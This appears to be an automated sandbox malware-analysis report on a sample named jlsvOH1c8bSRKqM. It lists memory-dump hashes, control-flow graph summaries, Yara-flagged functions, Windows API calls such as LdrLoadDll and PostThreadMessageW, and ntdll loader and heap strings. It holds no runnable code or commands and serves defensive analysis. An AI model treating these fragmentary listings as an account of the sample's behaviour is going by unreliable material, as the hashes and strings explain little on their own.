                                                • Opcode Fuzzy Hash: c491785d17ee7ac2747da85678ad315435b4e92eea9b242d555ac597f4169ff6
                                                • Instruction Fuzzy Hash: 4C11F2B58003599FCB10CF99C888BDEFFF4EB48324F24891AE458A7610C375A984CFA4
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 07062315
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1723211453.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7060000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: b16a4337c29f7cfe6e30113363594eb65bda55237fc8cd247eba31fa3294fa68
                                                • Instruction ID: d36c21407dbc067e2ebcba60310536ce10915338a33aa42116687d04a5af8d17
                                                • Opcode Fuzzy Hash: b16a4337c29f7cfe6e30113363594eb65bda55237fc8cd247eba31fa3294fa68
                                                • Instruction Fuzzy Hash: 6E11C2B58002599FDB10DF9AC449BDEFBF8EB48324F108519D558A7610C375A944CFA5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1696791377.000000000096D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0096D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_96d000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 985fc2b458808a0f1e8c6117f337e97fedf81192ada02ffd163c85a5dc2c32e6
                                                • Instruction ID: 24092225107c38534425f996870c367db5ec760e93b4969f6ce84f10e28e3dd7
                                                • Opcode Fuzzy Hash: 985fc2b458808a0f1e8c6117f337e97fedf81192ada02ffd163c85a5dc2c32e6
                                                • Instruction Fuzzy Hash: B5212871A00244DFDB05DF14DAC0F26BF69FB98314F24C569D9094B2A6C73AEC56C6A1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1696831761.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_97d000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 93d7a5e11201edb2478f8e9487874a90f232ba2bda39689c567bae6de586e6f2
                                                • Instruction ID: 14364d5e1f4d44e3c81f5eafdd67e15d66d5769a37ffbb4759639097fc24fe84
                                                • Opcode Fuzzy Hash: 93d7a5e11201edb2478f8e9487874a90f232ba2bda39689c567bae6de586e6f2
                                                • Instruction Fuzzy Hash: 5F21D072604200EFDB05DF14D980B26BBB5FF84314F24CAA9E94D4B296C33AD846CA61
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1696831761.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_97d000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 42171a2efb3e049ce3313e3e1c35e7da89d88561b03eaeb2c9928226d860c9ae
                                                • Instruction ID: 9a1b9d3bf3cf337cda72bcd1dc12bfc386be7a7f015601f8a430254f19a462f9
                                                • Opcode Fuzzy Hash: 42171a2efb3e049ce3313e3e1c35e7da89d88561b03eaeb2c9928226d860c9ae
                                                • Instruction Fuzzy Hash: AF21FF76604200DFDB14DF24D984B26BBB9FF88314F24C96DE80E4B296C33AD847CA61
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1696831761.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_97d000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b54e55c25a7c7661bce2c3eddae9e85dadeb86d27ef8b72457f84c4df04ee5e1
                                                • Instruction ID: d5d832f248483e62033791b520cc62f2fe62e3ce6f2e8e02e3236ea6404464c9
                                                • Opcode Fuzzy Hash: b54e55c25a7c7661bce2c3eddae9e85dadeb86d27ef8b72457f84c4df04ee5e1
                                                • Instruction Fuzzy Hash: 88215E765093808FDB12CF24D994715BF71EF46314F29C5EAD8498F6A7C33A980ACB62
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1696791377.000000000096D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0096D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_96d000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                • Instruction ID: a1957b0018b0249d79be1c9a8d4a92feac3df2c6bf6ff7f54bb3513a666f58a3
                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                • Instruction Fuzzy Hash: 40110372904240CFDB02CF00D5C4B16BF72FB94324F24C2A9D8090B2A6C33AE85ACBA1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1696831761.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_97d000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction ID: e48895c9595ec40132838d2eedde596afaab760d95634e57064f5d4673ff7a58
                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction Fuzzy Hash: 12117976504280DFDB16CF14D5C4B15BBB1FB84314F28C6AAD8494B696C33AD84ACB61
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697268377.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_cd0000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3c3c57e13e174ae3228ccff79d7a508b46938484065c991c0908978701a47739
                                                • Instruction ID: 81ae24b754cbedd316d49dc2855801300a39d407159792193ec673e67c7c4e7d
                                                • Opcode Fuzzy Hash: 3c3c57e13e174ae3228ccff79d7a508b46938484065c991c0908978701a47739
                                                • Instruction Fuzzy Hash: 0DA15B32E00215CFCF05DFA4C8405AEB7B2FF85300B15857AEA16AB365DB71EA56DB40

                                                Execution Graph

                                                Execution Coverage:1.2%
                                                Dynamic/Decrypted Code Coverage:5%
                                                Signature Coverage:7.9%
                                                Total number of Nodes:140
                                                Total number of Limit Nodes:7

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 254 417bd3-417bef 255 417bf7-417bfc 254->255 256 417bf2 call 42e3c3 254->256 257 417c02-417c10 call 42e8e3 255->257 258 417bfe-417c01 255->258 256->255 261 417c20-417c31 call 42cd83 257->261 262 417c12-417c1d call 42eb83 257->262 267 417c33-417c47 LdrLoadDll 261->267 268 417c4a-417c4d 261->268 262->261 267->268
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C45
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_400000_jlsvOH1c8bSRKqM.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 5017eacf575fa66b987127cbb462bddf0181e3326ae4c73234eae0b8cd340783
                                                • Instruction ID: 3399c8b729abe5c50f2b1dd34d5db3ba51e5c2a799b59b459bd5f853664e658c
                                                • Opcode Fuzzy Hash: 5017eacf575fa66b987127cbb462bddf0181e3326ae4c73234eae0b8cd340783
                                                • Instruction Fuzzy Hash: 130121B5E4020DABDF10DBE5DC42FDEB7789B54308F0041AAF90897241F635EB558B95

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 280 42b7c3-42b7fc call 404a13 call 42c883 NtClose
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_400000_jlsvOH1c8bSRKqM.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: e0810c323cfcc0e7647bb5a42e0f007d5aaa40598f42369497cf261a307a9015
                                                • Instruction ID: c47839424810816a31de3731444692d7f77b3233c2a3b7b3da474825dc8ccde1
                                                • Opcode Fuzzy Hash: e0810c323cfcc0e7647bb5a42e0f007d5aaa40598f42369497cf261a307a9015
                                                • Instruction Fuzzy Hash: 1BE04F31244214BBD620EA6AEC41FDBB75CDFC5754F50801AFA08A7182C6707A0187E4
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a6349aaea2dee3298ecdb4214be2ea146f032dd24080b735fef10770f5b6d98e
                                                • Instruction ID: 3d4a8ec41e7c5125418a31caa15521e9e0c31aded5a697a1c1e22df6d38b6ba9
                                                • Opcode Fuzzy Hash: a6349aaea2dee3298ecdb4214be2ea146f032dd24080b735fef10770f5b6d98e
                                                • Instruction Fuzzy Hash: FB90026120640003460572584414617800AD7E1201B55C035E20145B0DC625CAA56226
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c251702a7e8b9881835ee4f742cd28888b7120ca8ad03a637a1f93a5fbd86917
                                                • Instruction ID: 74b6f3b3a86666f00cb9df0ec6169908ad52cb82c7ebdb690ff3d7a16a4c64a5
                                                • Opcode Fuzzy Hash: c251702a7e8b9881835ee4f742cd28888b7120ca8ad03a637a1f93a5fbd86917
                                                • Instruction Fuzzy Hash: BF90023120540413D611725845047074009D7D1241F95C426A1424578DD756CB66A222
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 24fba69a6f457864d0088b9cc6bfa478ba7cfd189b10b3c6b498bcf452dad7dd
                                                • Instruction ID: fc259d6c8cc1d04e0931c072ce0dc2f31e2177feab8edfe8dd191d80ce4db542
                                                • Opcode Fuzzy Hash: 24fba69a6f457864d0088b9cc6bfa478ba7cfd189b10b3c6b498bcf452dad7dd
                                                • Instruction Fuzzy Hash: 0690023120548802D6107258840474B4005D7D1301F59C425A5424678DC795CAA57222
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3611bf545818435cd5ae7afadf8eb13cd94a957b45ee17a2d5bd64f7f6ea82f8
                                                • Instruction ID: bc5051d7db882bb6646cb09198d71de92c57379df9630b1fc0031d5be351dbe0
                                                • Opcode Fuzzy Hash: 3611bf545818435cd5ae7afadf8eb13cd94a957b45ee17a2d5bd64f7f6ea82f8
                                                • Instruction Fuzzy Hash: 9290023160950402D600725845147075005D7D1201F65C425A1424578DC795CB6566A3

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(-02n08K,00000111,00000000,00000000), ref: 004142FA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_400000_jlsvOH1c8bSRKqM.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: -02n08K$-02n08K
                                                • API String ID: 1836367815-2765054273
                                                • Opcode ID: 151592a9bd86819ff3a3a78173e0d24c6851f0672d5fe8d4bad98e26acc60452
                                                • Instruction ID: 88c72495a188172b1c6da3ec2a0e06e5bb97c01245be6291e86e2bd9bf65eac2
                                                • Opcode Fuzzy Hash: 151592a9bd86819ff3a3a78173e0d24c6851f0672d5fe8d4bad98e26acc60452
                                                • Instruction Fuzzy Hash: C411E5B1D0021C7AEB00AAA19C82DEFBB7C9F817D8F44806AFE1477141D67C4E468BB5

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(-02n08K,00000111,00000000,00000000), ref: 004142FA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_400000_jlsvOH1c8bSRKqM.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: -02n08K$-02n08K
                                                • API String ID: 1836367815-2765054273
                                                • Opcode ID: ec5c199d7cb316c84c2f9b0819a67f1b4511786be5bca7aba1065107264afd37
                                                • Instruction ID: d8351696ff161fa62588335948016de532a7d8a00b7df5912158028786ccdff3
                                                • Opcode Fuzzy Hash: ec5c199d7cb316c84c2f9b0819a67f1b4511786be5bca7aba1065107264afd37
                                                • Instruction Fuzzy Hash: 9201DBB1D0011C7ADB10AAE19C81DEFBB7CDF80798F44806AFE1467141D67C4E064BB5

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 270 42bae3-42bb24 call 404a13 call 42c883 RtlAllocateHeap
                                                APIs
                                                • RtlAllocateHeap.NTDLL(?,0041E3FB,?,?,00000000,?,0041E3FB,?,?,?), ref: 0042BB1F
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_400000_jlsvOH1c8bSRKqM.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 38bc7af278630d5790ec7858ceff0b22a3025680cf158ac78260adce428242f9
                                                • Instruction ID: 05e5b9f589b9c42f5e83a9554efb67e958f0674f352e2ac4cbb69bf8c1d25a3b
                                                • Opcode Fuzzy Hash: 38bc7af278630d5790ec7858ceff0b22a3025680cf158ac78260adce428242f9
                                                • Instruction Fuzzy Hash: 78E0ED716442187BDA14EE99EC41FDB77ADEFC5714F404419F908A7282D670BA118BB8

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 275 42bb33-42bb74 call 404a13 call 42c883 RtlFreeHeap
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,BC8D9489,00000007,00000000,00000004,00000000,004174AD,000000F4,?,?,?,?,?), ref: 0042BB6F
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_400000_jlsvOH1c8bSRKqM.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: 85b9538c6281af8b05fcab1f31e6d4afb2cc1f92716cd5a024de01b70d871b70
                                                • Instruction ID: e551e9f2b78c561caaee8950cf8420899f30717f74a5d320ebcd83fc6cba48be
                                                • Opcode Fuzzy Hash: 85b9538c6281af8b05fcab1f31e6d4afb2cc1f92716cd5a024de01b70d871b70
                                                • Instruction Fuzzy Hash: 65E06DB12006087BD614EE99EC41FDB77ADEFC4714F408019FA08A7282C670B9118BF8

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 285 42bb83-42bbbc call 404a13 call 42c883 ExitProcess
                                                APIs
                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,7F0D1D20,?,?,7F0D1D20), ref: 0042BBB7
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_400000_jlsvOH1c8bSRKqM.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: a05d517074970ad952adf01fc58b4a8a2ccc6c61a80cba6756ea391c7ee59bad
                                                • Instruction ID: af9b54458622120affa70d97448482ff79e9ec708bfe6d2fd62958871ffb0ded
                                                • Opcode Fuzzy Hash: a05d517074970ad952adf01fc58b4a8a2ccc6c61a80cba6756ea391c7ee59bad
                                                • Instruction Fuzzy Hash: 56E04F316402187BD624EA5ADC41FDB775DDFC5710F004419FA0867182C6B479418BE4
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 1fdcfefc7d0969e85db29157ef8824090cb33c9324354dd062cd74acd2e58627
                                                • Instruction ID: e459c39f64e16b2b85943c9682b89611a3127dd16eed8a43c9003c9788d0d412
                                                • Opcode Fuzzy Hash: 1fdcfefc7d0969e85db29157ef8824090cb33c9324354dd062cd74acd2e58627
                                                • Instruction Fuzzy Hash: B2B09B719055C5C5DF11E764460C717B954B7D5701F15C075D3030652F4738C1E5E276
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2160512332
                                                • Opcode ID: 3370b0c79cc6af109aebda36bf76147de2f193e5f961144e6cfe0a32d319c95e
                                                • Instruction ID: 8af1926595144e664719099c543d6239645a31c6f83af2fda7198fb7c8928c53
                                                • Opcode Fuzzy Hash: 3370b0c79cc6af109aebda36bf76147de2f193e5f961144e6cfe0a32d319c95e
                                                • Instruction Fuzzy Hash: 5B92E371604352AFE722CF28C884F6BB7E9BB88714F04492DFA94D7251D770EA84CB52
                                                Strings
                                                • Critical section address, xrefs: 01815425, 018154BC, 01815534
                                                • Critical section debug info address, xrefs: 0181541F, 0181552E
                                                • undeleted critical section in freed memory, xrefs: 0181542B
                                                • double initialized or corrupted critical section, xrefs: 01815508
                                                • Thread identifier, xrefs: 0181553A
                                                • Invalid debug info address of this critical section, xrefs: 018154B6
                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018154CE
                                                • 8, xrefs: 018152E3
                                                • corrupted critical section, xrefs: 018154C2
                                                • Critical section address., xrefs: 01815502
                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0181540A, 01815496, 01815519
                                                • Address of the debug info found in the active list., xrefs: 018154AE, 018154FA
                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018154E2
                                                • Thread is in a state in which it cannot own a critical section, xrefs: 01815543
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                • API String ID: 0-2368682639
                                                • Opcode ID: a64d938aae27370ced7129eb08e7b3357543e7c48eb416baa0db35d11cd753cd
                                                • Instruction ID: db0cd0de0ea2dabeb252157a6494e28ae737315525ad82744414c8c8d37dbc90
                                                • Opcode Fuzzy Hash: a64d938aae27370ced7129eb08e7b3357543e7c48eb416baa0db35d11cd753cd
                                                • Instruction Fuzzy Hash: 8581ADB2A80348EFDB20CF99C854BAEFBB9BB49714F544119F504F7685D371AA40CB91
                                                Strings
                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01812409
                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018124C0
                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01812412
                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01812624
                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01812498
                                                • @, xrefs: 0181259B
                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01812602
                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018125EB
                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01812506
                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0181261F
                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018122E4
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                • API String ID: 0-4009184096
                                                • Opcode ID: 159438d2c73410483c86874a606c57efd151670b0af3099b3fcd80cf20afff51
                                                • Instruction ID: 0bff5b4e52c41f9f11f252153d8381a95195ca85b7903b323f6f691ad1b6a74a
                                                • Opcode Fuzzy Hash: 159438d2c73410483c86874a606c57efd151670b0af3099b3fcd80cf20afff51
                                                • Instruction Fuzzy Hash: 38026EF2D002299BDB21DB54CC84BDAF7B8AB54704F1041DAE60DA7246EB709F85CF59
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                • API String ID: 0-2515994595
                                                • Opcode ID: 6e5f8f03f5957edf70b373030a5b55bddc7efbf5a7d230236879ddfaaf0042e4
                                                • Instruction ID: 5b11e349eb1539affaa253d6224e38101eef20c4b79da48520774aef80490471
                                                • Opcode Fuzzy Hash: 6e5f8f03f5957edf70b373030a5b55bddc7efbf5a7d230236879ddfaaf0042e4
                                                • Instruction Fuzzy Hash: 1851CEB15093099BC729DF58C848BABBBE8EF95344F14492DE999C3241EB70D604CB96
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                • API String ID: 0-1700792311
                                                • Opcode ID: 16eef42e35897a9cfe0ed727799daf385c67720d2541158dda97b48029461310
                                                • Instruction ID: 1409db73d74ced25fe829667a40be196cfba52db31bbbf0763e4cd3842ae7b6d
                                                • Opcode Fuzzy Hash: 16eef42e35897a9cfe0ed727799daf385c67720d2541158dda97b48029461310
                                                • Instruction Fuzzy Hash: DDD1CA7150068AEFDB62DF68D494AAEFBF1FF49718F088049F8459B312C7349A85CB10
                                                Strings
                                                • HandleTraces, xrefs: 01828C8F
                                                • VerifierDebug, xrefs: 01828CA5
                                                • VerifierDlls, xrefs: 01828CBD
                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01828A67
                                                • AVRF: -*- final list of providers -*- , xrefs: 01828B8F
                                                • VerifierFlags, xrefs: 01828C50
                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01828A3D
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                • API String ID: 0-3223716464
                                                • Opcode ID: 99bb4f5550c38df4a61e3fd0b5d19d58f186f3669031ae4e98e6bd3a2133d584
                                                • Instruction ID: 29775bbd1fe31c951cd8018c090955bd3ee2bcce6d09112f024b4ac44e676da0
                                                • Opcode Fuzzy Hash: 99bb4f5550c38df4a61e3fd0b5d19d58f186f3669031ae4e98e6bd3a2133d584
                                                • Instruction Fuzzy Hash: FF914871A453269FEB23DF68C880B1AB7E4AB56B14F09045DFA41EB241C7709B84CB91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
